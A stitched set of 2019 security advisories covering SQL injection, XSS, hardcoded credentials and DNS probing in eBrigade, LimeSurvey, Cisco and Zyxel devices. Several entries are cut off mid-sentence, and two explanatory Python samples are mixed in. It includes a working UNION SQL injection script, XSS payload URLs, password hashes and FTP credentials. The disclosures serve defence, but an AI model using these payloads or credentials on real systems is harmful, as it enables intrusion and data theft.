The reflected XSS vulnerability was found in the URL parameter 'sortBy'
of the path '/projects'. There an attacker may add arbitrary HTML code.
Such a link could be:

http://$IP/projects?sortBy=[[%22%3E%3Cscript%20src=%27/attachments/29/test.js%27%3E%3C%2Fscript%3E%22%2C%22%22]]

Vulnerable / tested versions:
-----------------------------
The following versions have been tested, which were the latest versions
available at the time of the test:
* 10.0.0
* 10.0.1

According to the vendor, all versions before v9.0.3 and v10.0.1 are
affected.
Vendor contact timeline:
------------------------
2019-10-02: Contacting vendor through secur...@openproject.com
2019-10-02: Vendor verified the vulnerabili
SEC Consult SA-20190926-0 :: Multiple SQL Injection vulnerabilities in eBrigade
SEC Consult Vulnerability Lab Security Advisory < 20190926-0 >
=======================================================================
              title: Multiple SQL Injection vulnerabilities
            product: eBrigade
 vulnerable version: <5.0
      fixed version: >=5.0
         CVE number: CVE-2019-16743, CVE-2019-16744, CVE-2019-16745
             impact: critical
           homepage: https://ebrigade.net
              found: 2019-06-06
                 by: D. Haintz (Office Vienna)
                     SEC Consult Vulnerability Lab
                     An integrated part of SEC Consult
                     Europe | Asia | North America
                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"eBrigade is a web application that allows the management of personnel,
vehicles and equipment of rescue centers (fire brigades), associations
of first responders and military organizations. Highly configurable,
eBrigade can meet the expectations of many other organizations. Skills
management, generation of the cover sheet according to availability.
Management of the interventions and the victims with assessment sheets
rescuers. Private social network. Notifications and alerts by email and
SMS. Accounting, reporting and numerous graphs allow precise monitoring
of the organization." (translated)

Source: https://ebrigade.net/

Business recommendation:
------------------------
The vendor provides a patch and users of this product are urged to
immediately upgrade to the latest version available. An in-depth
security analysis performed by security professionals is highly advised,
as the software may be affected by further security issues.

Vulnerability overview/description:
-----------------------------------
1) Multiple SQL Injection vulnerabilities
Due to insufficient sanitization of user input, an authenticated
attacker can execute arbitrary SQL code in several SELECT statements.
Since two of the three vulnerable parameters are completely unsanitized
and are used to serve ICAL files, an attacker can make a user download
manipulated calendar files. Besides that, an attacker can also dump the
whole database. The third vulnerability results from incorrect usage of
sanitization functions.
This enables an attacker to manipulate the SQL query with specially
crafted requests, resulting in a blind SQL injection, as described in
one of the following vulnerabilities.

a) & b) Multiple UNION SQL Injections (CVE-2019-16743, CVE-2019-16744)
The parameters of two links can be manipulated so that an arbitrary
query against any table or database can be appended to the output of
the resulting calendar files using the UNION functionality of SQL.

c) Boolean-based Blind SQL Injection (CVE-2019-16745)
The parameters of a search result can be manipulated to guess the
returned values of an arbitrary query.

Proof of concept:
-----------------
1) Multiple SQL Injection vulnerabilities
All vulnerabilities were tested with an authenticated user with the
lowest access rights (public). The whole PoC script requires an
authenticated user for any functionality. The user is authenticated by
a PHP session using the cookie PHPSESSID (the name may vary between web
servers). In conclusion, every request described below requires the PHP
session cookie.

a) UNION SQL Injection in evenement_ical.php (CVE-2019-16743)
The script evenement_ical.php uses the unsanitized parameter "evenement"
to query the database. The results are written into a downloadable
calendar file. By adding a UNION statement, an attacker can extend the
output with arbitrary data from the database.

The user input is read on line 42:

    $evenement=(isset($_GET['evenement'])?$_GET['evenement']:"");

On lines 88-89 it is added to the SQL statement:

    if ($evenement !="")
        $sql .= "\n and e.e_code = $evenement ";

which is executed and fetched on lines 136 and 138:

    $res = mysqli_query($dbc,$sql);
    while($row=mysqli_fetch_array($res)){

Since e_code is of type integer, the proper sanitization method would be
intval().

PoC URL:
evenement_ical.php?evenement=1+union+select+1,2,3,4,5,6,7,version(),9,10,11,12,13,14--
-> Version after 'LOCATION:'

PoC in Python:

    import re
    import requests

    url = input("URL without file (i.e. https://localhost/ebrigade): ")
    phpsession = input("PHPSESSID: ")
    cookies = {'PHPSESSID': phpsession}
    payload = '+union+select+1,2,3,4,5,6,7,version(),9,10,11,12,13,14--'

    print("Testing vulnerability")
    r = requests.get('{0}/evenement_ical.php?evenement=1{1}'.format(url, payload),
                     cookies=cookies)
    # The injected version() value ends up in the LOCATION: line of the calendar.
    matches = re.findall(r'^LOCATION:(.*)$', r.text, flags=re.MULTILINE)
    print("Found version: {0}".format(matches[-1]))

b) UNION SQL Injection in evenements.php (CVE-2019-16744)
The script evenements.php uses the unsanitized para
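The defect described for evenement_ical.php (an integer parameter pasted into the statement) and the fix the advisory names (intval(), here Python's int() plus a bound parameter), re-created as an added illustration against an in-memory SQLite database. This is not eBrigade code; the schema, table names and the "membre" table are constructed stand-ins.

```python
"""Added illustration, not eBrigade code: integer parameter concatenated into
SQL (the advisory's lines 88-89) beside the hardened form.  SQLite stands in
for MySQL; the tables and rows are constructed sample data."""
import sqlite3

# Constructed payload in the shape of the advisory's PoC URL, but reading a
# stand-in credential table instead of version().
SAMPLE_PAYLOAD = "1 union select 1, m_login, m_password from membre--"


def build_db():
    """Constructed schema: calendar events plus a table worth reading via UNION."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE evenement (e_code INTEGER, e_name TEXT, e_location TEXT);
        INSERT INTO evenement VALUES (1, 'Training', 'Station 1');
        INSERT INTO evenement VALUES (2, 'Drill', 'Station 2');
        CREATE TABLE membre (m_id INTEGER, m_login TEXT, m_password TEXT);
        INSERT INTO membre VALUES (1, 'admin', 'constructed-hash-value');
    """)
    return db


def ical_locations_vulnerable(db, evenement):
    """Mirrors evenement_ical.php lines 88-89: the raw GET value is pasted into
    the statement, so everything after the number becomes SQL."""
    sql = "SELECT e_code, e_name, e_location FROM evenement e WHERE 1=1"
    if evenement != "":
        sql += "\n and e.e_code = " + evenement + " "
    return [row[2] for row in db.execute(sql)]


def ical_locations_fixed(db, evenement):
    """The advisory's intval() advice plus a bound parameter: the value is
    coerced to an integer and never touches the statement text."""
    sql = "SELECT e_code, e_name, e_location FROM evenement e WHERE 1=1"
    params = []
    if evenement != "":
        # PHP's intval() silently turns "1 union ..." into 1; Python's int()
        # raises ValueError instead, which a request handler should map to 400.
        params.append(int(evenement))
        sql += "\n and e.e_code = ?"
    return [row[2] for row in db.execute(sql, params)]


def fixed_rejects(db, evenement):
    """True if the hardened handler refuses the value outright."""
    try:
        ical_locations_fixed(db, evenement)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = build_db()
    print("vulnerable:", ical_locations_vulnerable(db, SAMPLE_PAYLOAD))
    print("fixed rejects payload:", fixed_rejects(db, SAMPLE_PAYLOAD))
```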
SEC Consult SA-20190918-0 :: Reflected Cross-Site Scripting (XSS) in Oracle Mojarra JSF
SEC Consult Vulnerability Lab Security Advisory < 20190918-0 >
=======================================================================
              title: Reflected Cross-Site Scripting (XSS)
            product: Oracle Mojarra JSF included in Java EE 7
                     Eclipse Mojarra JSF
 vulnerable version: 2.2 & 2.3
      fixed version: https://github.com/javaserverfaces/mojarra/commits/MOJARRA_2_2X_ROLLING
                     https://github.com/javaserverfaces/mojarra/commits/MOJARRA_2_3X_ROLLING
                     https://github.com/eclipse-ee4j/mojarra
         CVE number: -
             impact: Medium
           homepage: https://javaserverfaces.github.io/
              found: 2018-11-12
                 by: Jean-Benjamin Rousseau (Office Zurich)
                     Guillaume Crouquet (Office Zurich)
                     SEC Consult Vulnerability Lab
                     An integrated part of SEC Consult
                     Europe | Asia | North America
                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"JavaServer Faces technology simplifies building user interfaces for
JavaServer applications. Developers can build web applications by
assembling reusable UI components in a page; connecting these components
to an application data source; and wiring client-generated events to
server-side event handlers. This project provides information on the
continued development of the JavaServer Faces specification. JavaServer
Faces (JSF) is a JCP Standard technology for authoring component based
user interfaces on the Java EE platform."

Source: https://javaee.github.io/javaserverfaces-spec/

Business recommendation:
------------------------
By exploiting the vulnerability documented in this advisory, an attacker
can execute arbitrary scripts in the context of the web application in
the victim's browser. Besides performing arbitrary actions within the
application with the victim's account or manipulating the application's
interface, the attacker can potentially steal session tokens, redirect
the victim to external pages and perform attacks against their browser.

SEC Consult recommends users to implement the available patches.
Vulnerability overview/description:
-----------------------------------
The Mojarra implementation of JavaServer Faces (JSF) v2.2 and v2.3 lacks
input validation on the javax.faces.ClientWindow parameter, which can
lead to reflected cross-site scripting (XSS) under certain conditions.
Mojarra JSF v2.2 and v2.3 are the user interface standards for Java EE 7
and Java EE 8 respectively.

The vulnerability is not directly exploitable in Mojarra JSF v2.2 and
v2.3. However, different frameworks based on this library that have a
custom implementation of the Faces-Request HTTP headers for AJAX
requests might be affected. PrimeFaces v6.0 is one example of a
vulnerable framework.

This vulnerability affects web applications fulfilling the following
conditions:
- Usage of a framework based on Mojarra JSF v2.2 or v2.3
- Usage of AJAX requests in the web application
- Custom implementation of the Faces-Request HTTP headers for AJAX
  requests
- Presence of the javax.faces.CLIENT_WINDOW_MODE context parameter set
  to "url" in the web.xml file:

    <context-param>
        <param-name>javax.faces.CLIENT_WINDOW_MODE</param-name>
        <param-value>url</param-value>
    </context-param>

Proof of concept:
-----------------
In this proof of concept, the tests are based on PrimeFaces v6.0, an
open source framework for JSF. Other frameworks based on Mojarra JSF 2.2
or 2.3 might also be affected.

Step 1: Generate an AJAX request on the web application and intercept
it.
---
POST /HelloPrimeFaces/faces/welcomePrimefaces.xhtml?jfwid=2a616ef87aeed7521b02ceb4e163:0 HTTP/1.1
Host: $IP
Content-Length: 405
Accept: application/xml, text/xml, */*; q=0.01
Origin: http://$IP
X-Requested-With: XMLHttpRequest
Faces-Request: partial/ajax
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: JSESSIONID=2a616ef87aeed7521b02ceb4e163
Connection: close

javax.faces.partial.ajax=true=j_idt18%3AbtnSurname=j_idt18%3AbtnSurname+j_idt18%3Asurname=j_idt18%3Agrid_idt18%3AbtnSurname=j_idt18%3AbtnSurname_idt18=j_idt18_idt18%3Afirstname=_idt18%3Asurname=surname=7025249133904776332%3A-921340693957557245=2a616ef87aeed7521b02ceb4e163%3A0
---

Step 2: Transpose the POST parameters into GET parameters and build a
new URL with them.

http://$IP/HelloPrimeFaces/faces/welcomePrimefaces.xhtml?jfwid=2a616ef87aeed7521b02ceb4e163:0=true=j_idt18%3AbtnSurname=j_idt18%3AbtnSurname+j_idt18%3Asurname=j_idt18%3Agrid_idt18%3AbtnSurname=j_idt18%3AbtnSurname_idt18=j_idt18_idt18%3Afirstname=_idt18%3Asurname=surname=7025249133904776332%3A-921340693957557245=2a616ef87aeed7521b02ceb4e163%3A0

Step 3: Strip out the javax.faces.ViewState GET parameter from the URL.

http://
SEC Consult SA-20190912-0 :: Stored and reflected XSS vulnerabilities in LimeSurvey
SEC Consult Vulnerability Lab Security Advisory < 20190912-0 >
=======================================================================
              title: Stored and reflected XSS vulnerabilities
            product: LimeSurvey
 vulnerable version: <= 3.17.13
      fixed version: =>3.17.14
         CVE number: CVE-2019-16172, CVE-2019-16173
             impact: medium
           homepage: https://www.limesurvey.org/
              found: 2019-08-23
                 by: Andreas Kolbeck (Office Munich)
                     David Haintz (Office Vienna)
                     SEC Consult Vulnerability Lab
                     An integrated part of SEC Consult
                     Europe | Asia | North America
                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"LimeSurvey is the tool to use for your online surveys. Whether you are
conducting simple questionnaires with just a couple of questions or
advanced assessments with conditionals and quota management, LimeSurvey
has got you covered. LimeSurvey is 100% open source and will always be
transparently developed. We can help you reach your goals."

Source: https://www.limesurvey.org/

Business recommendation:
------------------------
LimeSurvey suffered from a vulnerability due to improper input and
output validation. By exploiting this vulnerability an attacker could:
1. Attack other users of the web application with JavaScript code,
   browser exploits or Trojan horses, or
2. perform unauthorized actions in the name of another logged-in user.

The vendor provides a patch which should be installed immediately.
Furthermore, a thorough security analysis is highly recommended as only
a short spot check has been performed and additional issues are to be
expected.

Vulnerability overview/description:
-----------------------------------
1) Stored and reflected XSS vulnerabilities
LimeSurvey suffers from a stored and reflected cross-site scripting
vulnerability, which allows an attacker to execute JavaScript code with
the permissions of the victim. In this way it is possible to escalate
privileges from a low-privileged account e.g. to "SuperAdmin".
Proof of concept:
-----------------
1) Stored and reflected XSS vulnerabilities

Example 1 - Stored XSS (CVE-2019-16172):
The attacker needs the appropriate permissions in order to create new
survey groups. Then create a survey group with a JavaScript payload in
the title, for example:

    test

When the survey group is deleted, e.g. by an administrative user, the
JavaScript code will be executed as part of the "success" message.

Example 2 - Reflected XSS (CVE-2019-16173):
The following proof of concept displays the current cookie values,
which contain the CSRF token. The parameter "surveyid" is not filtered
properly:

http://$host/index.php/admin/survey?mandatory=1=xxx=xxx%22%3E%3Cimg%20src=x%20onerror=%22alert(document.cookie)%22%3E=listquestions=question

If the URL schema is configured differently, the following payload
works:

http://$host/index.php?r=admin/survey=1=xxx=xxx">=listquestions=question

Vulnerable / tested versions:
-----------------------------
The vulnerabilities have been verified to exist in version 3.17.9 and
the latest version 3.17.13. It is assumed that older versions are
affected as well.

Vendor contact timeline:
------------------------
2019-08-29: Contacting vendor through
            https://bugs.limesurvey.org/view.php?id=15204
2019-09-02: Fixes available:
            https://github.com/LimeSurvey/LimeSurvey/commit/32d6a5224327b246ee3a2a08500544e4f80f9a9a
            https://github.com/LimeSurvey/LimeSurvey/commit/f1c1ad2d24eb262363511fcca2e96ce737064006
2019-09-02: Release of LimeSurvey v3.17.14 which fixes the security
            issues
2019-09-03: Release of LimeSurvey v3.17.15 bug fix
2019-09-12: Coordinated release of security advisory

Solution:
---------
Update to version 3.17.15 or higher:
https://www.limesurvey.org/stable-release

The vendor provides a detailed list of changes here:
https://www.limesurvey.org/limesurvey-updates/2188-limesurvey-3-17-14-build-190902-released

Workaround:
-----------
No workaround available.
Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab
SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult.
It ensures the continued knowledge gain of SEC Consult in the field of
network and application security to stay ahead of the attacker. The SEC
Consult Vulnerability Lab supports high-quality penetration testing and
the evaluation of new offensive and defensive technologies for our
customers. Hence our customers obtain
SEC Consult SA-20190904-0 :: Multiple vulnerabilities in Cisco router series RV34X, RV26X and RV16X
SEC Consult Vulnerability Lab Security Advisory < 20190904-0 >
=======================================================================
              title: Multiple vulnerabilities
            product: Cisco RV340, Cisco RV340W, Cisco RV345,
                     Cisco RV345P, Cisco RV260, Cisco RV260P,
                     Cisco RV260W, Cisco 160, Cisco 160W
 vulnerable version: Cisco RV34X - 1.0.02.16,
                     Cisco RV16X/26X - 1.0.00.15
      fixed version: see "Solution"
         CVE number: -
             impact: High
           homepage: https://www.cisco.com/
              found: 2019-05-15
                 by: T. Weber, S. Viehböck (Office Vienna)
                     IoT Inspector
                     SEC Consult Vulnerability Lab
                     An integrated part of SEC Consult
                     Europe | Asia | North America
                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"Securely connecting your small business to the outside world is as
important as connecting your internal network devices to one another.
Cisco Small Business RV Series Routers offer virtual private networking
(VPN) technology so your remote workers can connect to your network
through a secure Internet pathway."

Source: https://www.cisco.com/c/en/us/products/routers/small-business-rv-series-routers/index.html

Business recommendation:
------------------------
We want to thank Cisco for the very quick and professional response and
great coordination. Customers are urged to update the firmware of their
devices.

Vulnerability overview/description:
-----------------------------------
1) Hardcoded Credentials
The device contains hardcoded users and passwords which can be used to
log in via SSH, at least on an emulated device. During the communication
with Cisco it turned out that: "Accounts like the 'debug-admin' and
'root' can not be accessed from console port, CLI or webui". Therefore,
these accounts had no real functionality and cannot be used for
malicious actions.

2) Known GNU glibc Vulnerabilities
The used GNU glibc in version 2.19 is outdated and contains multiple
known vulnerabilities. The outdated version was found by IoT Inspector.
One of the discovered vulnerabilities (CVE-2015-7547, "getaddrinfo()
buffer overflow") was verified by using the MEDUSA scalable firmware
runtime.
3) Known BusyBox Vulnerabilities
The used BusyBox toolkit in version 1.23.2 is outdated and contains
multiple known vulnerabilities. The outdated version was found by IoT
Inspector. One of the discovered vulnerabilities (CVE-2017-16544) was
verified by using the MEDUSA scalable firmware runtime.

4) Multiple Vulnerabilities - IoT Inspector Report
Further information can be found in the IoT Inspector report:
https://r.sec-consult.com/ciscoiot

Proof of concept:
-----------------
1) Hardcoded Credentials
The following hardcoded hashes were found in the 'shadow' file of the
firmware:

root:$1$hPNSjUZA$7eKqEpqVYltt9xJ6f0OGf0:15533:0:9:7:::
debug-admin:$1$.AAm0iJ4$na9wZwly9pSrdS8MhcGKw/:15541:0:9:7:::
[...]

The undocumented user 'debug-admin' is also contained in this file.

Starting the dropbear daemon as a background process on the emulated
firmware:
---
# dropbear -E
# [1109] Running in background
#
# [1112] Child connection from :52718
[1112] /var must be owned by user or root, and not writable by others
[1112] Password auth succeeded for 'debug-admin' from :52718
---

Log on via another host connected to the same network. For this PoC the
password of debug-admin was changed in the 'shadow' file.
---
[root@localhost medusa]# ssh debug-admin@ /bin/ash -i
debug-admin@'s password:
/bin/ash: can't access tty; job control turned off

BusyBox v1.23.2 (2018-11-21 18:22:56 IST) built-in shell (ash)

/tmp $
---

The 'debug-admin' user has the same privileges as 'root'. This can be
determined from the corresponding sudoers file in the firmware:
[...]
## User privilege specification
##
root ALL=(ALL) ALL
debug-admin ALL=(ALL) ALL

## Uncomment to allow members of group wheel to execute any command
# %wheel ALL=(ALL) ALL
[...]

During the communication with Cisco it turned out that: "Accounts like
the 'debug-admin' and 'root' can not be accessed from console port, CLI
or webui". Therefore, these accounts had no real functionality and
cannot be used for malicious actions.
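An added firmware-audit check, not part of the advisory or of Cisco's firmware, that cross-references an extracted shadow file with the sudoers file to surface accounts that both carry a usable password hash and hold unrestricted sudo. The sample input is constructed from the two shadow lines and the sudoers excerpt quoted above, plus two locked accounts added for contrast.

```python
"""Added firmware-audit helper (not from the advisory): find accounts that
have a real password hash in /etc/shadow AND an "ALL=(ALL) ALL" sudoers
rule, i.e. undocumented root-equivalent logins such as 'debug-admin'."""
import re

# Constructed sample: the shadow entries and sudoers excerpt quoted in the
# advisory, plus two locked accounts ("*" and "!") to show they are skipped.
SAMPLE_SHADOW = """root:$1$hPNSjUZA$7eKqEpqVYltt9xJ6f0OGf0:15533:0:9:7:::
debug-admin:$1$.AAm0iJ4$na9wZwly9pSrdS8MhcGKw/:15541:0:9:7:::
nobody:*:15533:0:99999:7:::
daemon:!:15533:0:99999:7:::
"""
SAMPLE_SUDOERS = """## User privilege specification
##
root ALL=(ALL) ALL
debug-admin ALL=(ALL) ALL

## Uncomment to allow members of group wheel to execute any command
# %wheel ALL=(ALL) ALL
"""

# crypt(3) hash-type prefixes; "$1$" is MD5-based crypt, considered weak.
HASH_PREFIXES = {"$1$": "md5crypt", "$5$": "sha256crypt", "$6$": "sha512crypt"}

# "user ALL=(ALL) ALL" or "user ALL=(ALL:ALL) NOPASSWD: ALL"
SUDO_ALL_RE = re.compile(
    r"^(\S+)\s+ALL\s*=\s*\(ALL(?::ALL)?\)\s+(?:NOPASSWD:\s*)?ALL\s*$")


def hash_type(pw_field):
    """Classify a shadow password field by its crypt prefix."""
    for prefix, name in HASH_PREFIXES.items():
        if pw_field.startswith(prefix):
            return name
    return "other"


def shadow_accounts_with_password(shadow_text):
    """Return {user: hash_type} for entries whose password field is a real hash.
    A field of "*", "!..." or "" means password login is disabled."""
    accounts = {}
    for line in shadow_text.splitlines():
        fields = line.split(":")
        if len(fields) < 2 or not fields[0]:
            continue
        user, pw_field = fields[0], fields[1]
        if pw_field and pw_field[0] not in "*!":
            accounts[user] = hash_type(pw_field)
    return accounts


def sudoers_full_access(sudoers_text):
    """Return the user names (not %groups) granted ALL=(ALL) ALL, ignoring
    comment lines such as the commented-out %wheel rule."""
    users = set()
    for line in sudoers_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = SUDO_ALL_RE.match(line)
        if m and not m.group(1).startswith("%"):
            users.add(m.group(1))
    return users


def find_undocumented_admins(shadow_text, sudoers_text, documented=("root",)):
    """Accounts that can log in with a password, have full sudo, and are not
    in the documented list; returned as sorted (user, hash_type) pairs."""
    with_pw = shadow_accounts_with_password(shadow_text)
    full_sudo = sudoers_full_access(sudoers_text)
    return sorted((u, with_pw[u]) for u in with_pw
                  if u in full_sudo and u not in documented)


if __name__ == "__main__":
    for user, kind in find_undocumented_admins(SAMPLE_SHADOW, SAMPLE_SUDOERS):
        print(f"undocumented root-equivalent account: {user} ({kind} hash)")
```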
2) Known GNU glibc Vulnerabilities
GNU glibc version 2.19 contains multiple CVEs like:
CVE-2014-4043, CVE-2014-9402, CVE-2014-9761, CVE-2014-9984,
CVE-2015-1472, CVE-2015-5277, CVE-2015-8778, CVE-2015-87
SEC Consult SA-20190829-1 :: External DNS Requests in Zyxel USG/UAG/ATP/VPN/NXC series
SEC Consult Vulnerability Lab Security Advisory < 20190829-1 >
=======================================================================
              title: External DNS Requests
            product: Zyxel USG/UAG/ATP/VPN/NXC series
 vulnerable version: see "Vulnerable / tested version"
      fixed version: see "Solution"
         CVE number: -
             impact: medium
           homepage: https://www.zyxel.com
              found: 2019-06-19
                 by: Thomas Weber (Office Vienna)
                     SEC Consult Vulnerability Lab
                     An integrated part of SEC Consult
                     Europe | Asia | North America
                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"Focused on innovation and customer-centricity, Zyxel Communications
Corp. has been connecting people to the internet for nearly 30 years. We
keep promoting creativity which meets the needs of customers. This
spirit has never been changed since we developed the world's first
integrated 3-in-1 data/fax/voice modem in 1992. Our ability to adapt and
innovate with networking technology places us at the forefront of
understanding connectivity for telco/service providers, businesses and
home users. We're building the networks of tomorrow, helping unlock the
world's potential and meeting the needs of the modern workplace;
powering people at work, life and play. We stand side-by-side with our
customers and partners to share new approaches to networking that will
unleash their abilities. Loyal friend, powerful ally, reliable resource
— we are Zyxel, Your Networking Ally."

Source: https://www.zyxel.com/about_zyxel/company_overview.shtml

Business recommendation:
------------------------
SEC Consult recommends Zyxel customers to upgrade the firmware to the
latest version available. A thorough security review should be
performed by security professionals to identify further potential
security issues.
Vulnerability overview/description:
-----------------------------------
1) Information Disclosure via Unauthenticated External DNS Requests
An unauthenticated attacker can make the device issue DNS requests,
either to flood a third party's DNS service with requests that carry a
spoofed origin or to probe whether domain names exist on the internal
network behind the firewall.

Proof of concept:
-----------------
1) Information Disclosure via Unauthenticated External DNS Requests
By sending the following POST request an attacker can probe for the
domain "subdomain.domain.com":
---
POST /redirect.cgi?original_url=http%3a%2f%2f192.168.1.1%2f HTTP/1.1
Host: 192.168.1.1
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 16

arip=subdomain.domain.com
---

The following GET request can be used for the same purpose:
---
GET /redirect.cgi?arip=subdomain.domain.com_url=http%3a%2f%2f192.168.1.1%2f HTTP/1.1
Host: 192.168.1.1
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
Connection: close
Cache-Control: max-age=0
---

If the domain can be resolved, the response contains the resolved IP
address within the cookie value:
---
HTTP/1.1 200 OK
Date: Mon, 24 Jun 2019 08:14:33 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: Mon, 16 Apr 1973 13:10:00 GMT
Set-Cookie: arip=; path=/
Set-Cookie: zy_pc_browser=1; path=/
Connection: close
Content-Type: text/html
Content-Length: 9099

[...]
---

If the domain cannot be resolved, a redirection is returned instead:
---
HTTP/1.1 302 Found
Date: Mon, 24 Jun 2019 08:11:57 GMT
Location: ext-js/app/view/login/useraware.html
Content-Length: 220
Connection: close
Content-Type: text/html; charset=iso-8859-1

[...]
---

Vulnerable / tested versions:
-----------------------------
The following versions have been tested, other versions might be
affected as well:
Zyxel USG110       ZLD 4.33
Zyxel USG210       ZLD 4.33
Zyxel USG310       ZLD 4.33
Zyxel USG1100      ZLD 4.33
Zyxel USG1900      ZLD 4.33
Zyxel USG2200-VPN  ZLD 4.33
Zyxel UAG2100      ZLD 4.18
Zyxel UAG4100      ZLD 4.18

The vendor provided the following list of affected devices:
Zyxel ATP200
SEC Consult SA-20190829-0 :: Hardcoded FTP Credentials in Zyxel NWA/NAP/WAC wireless access point series
SEC Consult Vulnerability Lab Security Advisory < 20190829-0 >
=======================================================================
              title: Hardcoded FTP Credentials
            product: Zyxel NWA/NAP/WAC wireless access point series
 vulnerable version: see "Vulnerable / tested version"
      fixed version: see "Solution"
         CVE number: -
             impact: medium
           homepage: https://www.zyxel.com
              found: 2019-06-19
                 by: Thomas Weber (Office Vienna)
                     IoT Inspector
                     SEC Consult Vulnerability Lab
                     An integrated part of SEC Consult
                     Europe | Asia | North America
                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"Focused on innovation and customer-centricity, Zyxel Communications
Corp. has been connecting people to the internet for nearly 30 years. We
keep promoting creativity which meets the needs of customers. This
spirit has never been changed since we developed the world's first
integrated 3-in-1 data/fax/voice modem in 1992. Our ability to adapt and
innovate with networking technology places us at the forefront of
understanding connectivity for telco/service providers, businesses and
home users. We're building the networks of tomorrow, helping unlock the
world's potential and meeting the needs of the modern workplace;
powering people at work, life and play. We stand side-by-side with our
customers and partners to share new approaches to networking that will
unleash their abilities. Loyal friend, powerful ally, reliable resource
— we are Zyxel, Your Networking Ally."

Source: https://www.zyxel.com/about_zyxel/company_overview.shtml

Business recommendation:
------------------------
SEC Consult recommends Zyxel customers to upgrade the firmware to the
latest version available. A thorough security review should be
performed by security professionals to identify further potential
security issues.

Vulnerability overview/description:
-----------------------------------
1) Hardcoded FTP Credentials
An FTP service runs on the Zyxel wireless access point and holds the
configuration file for the WiFi network. This FTP server can be
accessed with hardcoded credentials that are embedded in the firmware
of the AP.
When the WiFi network is bound to another VLAN, an attacker can cross
into that network by fetching the credentials from the FTP server. The
credentials were found by an automated scan with IoT Inspector.

Proof of concept:
-----------------
1) Hardcoded FTP Credentials
The username "devicehaecived" and the password "1234" can be used to
access the FTP server of the AP on port 21. The content of the FTP
server looks like the following listing:
---
$ ls
cert
conf
debug
idp
packet_trace
script
tmp
wtp_image
---

The directory "conf" contains all configuration files, which store the
WiFi SSIDs and passphrases.

Vulnerable / tested versions:
-----------------------------
The following versions have been manually tested and were automatically
verified with IoT Inspector:
Zyxel NWA5121-NI       5.50 patch 0 and earlier
Zyxel NWA5121-N        5.50 patch 0 and earlier

The vendor provided the following list of affected devices:
Zyxel WAC6103D-I       5.50 patch 0 and earlier
Zyxel WAC6303D-S       5.50 patch 0 and earlier
Zyxel WAC6502D-E       5.50 patch 0 and earlier
Zyxel WAC6502D-S       5.50 patch 0 and earlier
Zyxel WAC6503D-S       5.50 patch 0 and earlier
Zyxel WAC6553D-E       5.50 patch 0 and earlier
Zyxel WAC6552D-S       5.50 patch 0 and earlier
Zyxel WAC5302D-S       5.50 patch 0 and earlier
Zyxel NWA5123-AC       5.50 patch 0 and earlier
Zyxel NWA5123-AC HD    5.50 patch 0 and earlier
Zyxel NWA5123-NI       5.50 patch 0 and earlier
Zyxel NWA5301-NJ       5.50 patch 0 and earlier
Zyxel NWA1302-AC       5.50 patch 0 and earlier
Zyxel NWA1123-ACv2     5.50 patch 0 and earlier
Zyxel NWA1123-AC HD    5.50 patch 0 and earlier
Zyxel NWA1123-AC PRO   5.50 patch 0 and earlier
Zyxel NAP102           5.50 patch 0 and earlier
Zyxel NAP203           5.50 patch 0 and earlier
Zyxel NAP303           5.50 patch 0 and earlier
Zyxel NAP353           5.50 patch 0 and earlier

Vendor contact timeline:
------------------------
2019-06-26: Contacting vendor through secur...@zyxel.com.tw.
2019-06-27: Vendor changed PGP key. Sent advisory with new key. Vendor
            confirmed receipt.
2019-07-03: Asked for an update; Vendor told that they
SEC Consult SA-20190822-0 :: Multiple Vulnerabilities in OpenPGP.js
SEC Consult Vulnerability Lab Security Advisory < 20190822-0 >
=======================================================================
              title: Multiple Vulnerabilities
            product: OpenPGP.js
 vulnerable version: <=4.2.0
      fixed version: 4.3.0
         CVE number: CVE-2019-9153, CVE-2019-9154, CVE-2019-9155
             impact: critical
           homepage: https://openpgpjs.org/
              found: 2018-2019
                 by: Wolfgang Ettlinger (Office Vienna)
                     SEC Consult Vulnerability Lab
                     An integrated part of SEC Consult
                     Europe | Asia | North America
                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"This project aims to provide an Open Source OpenPGP library in
JavaScript so it can be used on virtually every device. Instead of
other implementations that are aimed at using native code, OpenPGP.js
is meant to bypass this requirement (i.e. people will not have to
install gpg on their machines in order to use the library). The idea is
to implement all the needed OpenPGP functionality in a JavaScript
library that can be reused in other projects that provide browser
extensions or server applications. It should allow you to sign,
encrypt, decrypt, and verify any kind of text - in particular e-mails -
as well as managing keys."

URL: https://openpgpjs.org/

Business recommendation:
------------------------
SEC Consult was tasked by the German Bundesamt für Sicherheit in der
Informationstechnik (BSI) with conducting a security audit of the
Mailvelope browser extension as well as the parts of OpenPGP.js used by
Mailvelope. During the course of this audit multiple security
vulnerabilities with severities ranging from minor to critical have been
identified. Some of the vulnerabilities with higher severity are
published as an advisory.
A more detailed description of the vulnerabilities, as well as a
description of other vulnerabilities found during this project, can be
found in the report that has been made available by the BSI:
https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Publications/Studies/Mailvelope_Extensions/Mailvelope_Extensions_pdf.html

Vulnerability overview/description:
-----------------------------------
1) Message Signature Bypass (CVE-2019-9153)
OpenPGP defines several types of signatures, each carrying a different
semantic. Signatures are implemented as packets, and each signature
